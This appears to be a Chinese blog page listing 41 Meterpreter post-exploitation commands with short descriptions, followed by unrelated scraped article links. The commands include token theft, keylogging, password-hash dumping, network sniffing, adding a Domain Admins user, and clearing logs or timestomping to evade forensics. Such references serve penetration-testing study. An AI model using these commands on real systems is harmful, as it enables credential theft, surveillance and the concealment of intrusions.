meterpreter是Metasploit框架中的一个杀手锏,通常作为漏洞溢出后的攻击载荷所使用,攻击载荷在触发漏洞后能够返回给我们一个控制通道。

常见的meterpreter命令

  1.  run scriptname       运行Meterpreter脚本,在scripts/meterpreter目录下可查看所有的脚本名。
  2. sysinfo                    列出受控主机的系统信息。
  3.   ls                             列出目标主机的文件和文件夹信息。
  4. use priv                    加载特权提升扩展模块,来扩展Meterpreter库。
  5. ps                            显示所有运行进程以及关联的用户账号。
  6. migrate PID               迁移到一个指定的进程ID(PID可通过ps从目标主机上获得)。
  7. use incognito             加载incognito功能(用来盗窃目标主机的令牌或是假冒用户).
  8. list_tokens -u            列出目标主机用户的可用令牌。
  9. list_tokens -g            列出目标主机用户组的可用令牌。
  10. impersonate_token DOMAIN_NAME\\USERNAME             假冒目标主机上的可用令牌。
  11. steal_token PID          盗窃给定进程的可用令牌并进行令牌假冒。
  12. drop_token                停止假冒当前令牌。
  13. getsystem                  通过各种攻击向量来提升系统用户权限。
  14. shell                          以所有可用令牌来运行一个交互的shell。
  15. execute -f cmd.exe -i  执行cmd.exe命令并进行交互。
  16. execute -f cmd.exe -i -t 以所有可用的令牌来执行cmd命令。
  17. execute -f cmd.exe -i -H -t  以所有可用的令牌来执行cmd命令并隐藏该进程。
  18. rev2self                      回到控制目标主机的初始化用户账号下。
  19. reg command              在目标主机注册表中进行交互,创建,删除,查询等操作。
  20. setdesktop number      切换到另一个用户界面(该功能基于哪些用户已登录)。
  21. screenshot                  对目标主机的屏幕进行截图。
  22. upload file                   向目标主机上传文件
  23. download file               从目标主机下载文件。
  24. keyscan_start             针对远程目标主机开启键盘记录功能。
  25. keyscan_dump            存储目标主机上捕获的键盘记录。
  26. keyscan_stop              停止针对目标主机的键盘记录功能。
  27. getprivs                      尽可能多的获取目标主机上的特权。
  28. uictl enable keyboard/mouse     接管目标主机的键盘和鼠标。
  29. background                 将你当前的Meterpreter shell转为后台执行。
  30. hashdump                   导出目标主机中的口令哈希值。
  31. use sniffer                   加载嗅探模块。
  32. sniffer_interfaces          列出目标主机所有开放的网络接口。
  33. sniffer_dump interfaceID pcapname        在目标主机上启动嗅探。
  34. sniffer_stats interfaceID  获取正在实施嗅探网络接口的统计数据。
  35. sniffer_start interfaceID packet-buffer  在目标主机上针对特定范围的数据包缓冲区启动嗅探。
  36. sniffer_stop interfaceID 停止嗅探。
  37. add_user username password -h ip   在远程目标主机上添加一个用户。
  38. add_group_user "Domain Admins" username -h ip     将用户添加到目标主机的域管理员组中。
  39. clearev                        清除目标主机上的日志记录。
  40. timestomp                   修改文件属性,例如修改文件的创建时间(反取证调查)。
  41. reboot                         重启目标主机。

metasploit中meterpreter命令的更多相关文章

  1. [转]Metasploit的meterpreter黑客脚本列表

    原文地址: 摘要: Metasploit的框架是一个令人难以置信的黑客攻击和渗透测试工具,每一个黑客称职的应该是熟悉和有能力的. 在上一篇文章中,我提供了你的 meterpreter 命令列表.这些命 ...

  2. Meterpreter命令详解

      0x01初识Meterpreter 1.1.什么是Meterpreter Meterpreter是Metasploit框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以 ...

  3. 了解Metasploit中的Payloads(有效载荷)

    什么是payload? payload又称为攻击载荷,主要是用来建立目标机与攻击机稳定连接的,可返回shell,也可以进行程序注入等.也有人把payloads称 为shellcode. Shellco ...

  4. 【逆向&编程实战】Metasploit中的安卓载荷凭什么吊打SpyNote成为安卓端最强远控

    文章作者:MG1937 QQ:3496925334 CNBLOG:ALDYS4 未经许可,禁止转载 前言 说起SpyNote大家自然不陌生,这款恶意远控软件被利用在各种攻击场景中 甚至是最近也捕获到了 ...

  5. Kail Linux渗透测试教程之在Metasploit中扫描

    Kail Linux渗透测试教程之在Metasploit中扫描 在Metasploit中扫描 在Metasploit中,附带了大量的内置扫描器.使用这些扫描器可以搜索并获得来自一台计算机或一个完整网络 ...

  6. 【每日一linux命令6】命令中的命令

    许多命令在执行后,会进入该命令的操作模式,如 fdisk.pine.top 等,进入后我们必须要使用该 命令中的命令,才能正确执行:而一般要退出该命令,可以输入 exit.q.quit 或是按[Ctr ...

  7. sublime text2在windows中以命令行启动

    sublime text2在windows中以命令行启动   把执行文件添加到PATH中即可,如图: 如果你和我一样习惯了mac下的简写subl,那么需要在程序目录中新建一个批处理文件subl.bat ...

  8. oracle中imp命令详解 .

    转自http://www.cnblogs.com/songdavid/articles/2435439.html oracle中imp命令详解 Oracle的导入实用程序(Import utility ...

  9. linux运维中的命令梳理(四)

    ----------管理命令---------- ps命令:查看进程 要对系统中进程进行监测控制,查看状态,内存,CPU的使用情况,使用命令:/bin/ps (1) ps :是显示瞬间进程的状态,并不 ...

随机推荐

  1. C# 网络请求

    C#自带网络请求 由于偶尔会用到服务端请求,写下随笔,以便下次使用 . var Url = "http://rueiqiang.vicp.net/api/Franchisee/QueryIn ...

  2. Django的datetime.timedelta类(Django编程-2)

    datetime.timedelta对象代表两个时间之间的时间差,两个date或datetime对象相减就可以返回一个timedelta对象. 如果有人问你昨天是几号,这个很容易就回答出来了.但是如果 ...

  3. BZOJ4399魔法少女LJJ——线段树合并+并查集

    题目描述 在森林中见过会动的树,在沙漠中见过会动的仙人掌过后,魔法少女LJJ已经觉得自己见过世界上的所有稀奇古怪的事情了LJJ感叹道“这里真是个迷人的绿色世界,空气清新.淡雅,到处散发着醉人的奶浆味: ...

  4. BZOJ3456 城市规划(多项式求逆)

    设f[i]为连通图的数量,g[i]为不连通图的数量,显然有f[i]=2i*(i-1)/2-g[i],g[i]通过枚举1所在连通块大小转移,有g[i]=Σf[j]*C(i-1,j-1)·2(i-j)*( ...

  5. hdu 3727 Jewel (可持久化线段树+bit)

    链接: http://acm.hdu.edu.cn/showproblem.php?pid=3727 题意: 对一段序列进行四种操作: Insert x :在序列尾部插入一个x: Query_1 s ...

  6. MT【3】只有零向量旋转不变

    解答: 评:利用了零向量方向不唯一的性质.

  7. [hgoi#2019/3/10]赛后总结

    关于本次hg模拟赛,题目来源于CF1110. t1-无意义运算符(meaning) 题目描述 最大公约数和位运算之间有共同点吗?是时候来研究一下了. 给定一个正整数a,请找到一个闭区间[1,a-1] ...

  8. 支持ajax跨域调用的WCF搭建示例

    支持ajax 跨域调用的WCF搭建 1.新建一个"ASP.NET空Web应用程序"项目. 2.新建一个“WCF服务(支持ajax)”. 3.修改WCFAjaxService.svc ...

  9. 【51Nod1405】树上距离和 二次扫描与换根法

    题目大意:给定一棵 N 个点的边权均为 1 的树,依次输出每个点到其他各个点的距离和. 题解:首先任意选定一个节点为根节点,比如 1,第一遍 dfs 遍历树求出子树大小.树上前缀和.第二遍 dfs 遍 ...

  10. 解决TypeError: __init__() missing 1 required positional argument: 'on_delete'

    试用Djiango的时候发现执行mange.py makemigrations 和 migrate是会报错,少位置参数on_delete,查了一下是因为指定外键的方式不对,改一下就OK了. 代码如下: ...